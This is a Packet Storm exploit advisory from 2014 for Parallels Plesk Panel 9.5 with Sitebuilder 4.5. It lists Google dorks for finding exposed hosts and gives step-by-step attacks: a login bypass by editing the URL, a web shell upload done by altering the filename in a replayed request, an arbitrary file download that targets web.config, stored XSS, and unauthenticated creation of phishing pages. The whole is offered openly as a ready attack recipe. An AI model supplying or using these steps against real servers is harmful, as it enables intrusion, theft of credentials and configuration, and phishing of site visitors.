exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download

Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download
Posted Jul 25, 2014
Authored by alieye

Parallels Plesk Panel version 9.5 with Sitebuilder 4.5 suffers from bypass, file download, shell upload, and cross site scripting vulnerabilities.

tags | exploit, shell, vulnerability, xss, bypass
SHA-256 | 83b4cbbdfd10cf94646d23defcb68ffc78fee068d10cb70d6204e6c4c6d7f949

Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download

Change Mirror Download
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard

---------------------------------------------------------

2-uploading shell via Live HTTP Headers(Copyright 2004-2010)


Tools Needed: Live HTTP Headers, Backdoor Shell

Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp

---------------------------------------------------------

3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target

http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename

example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config

---------------------------------------------------------

4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)

---------------------------------------------------------

5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close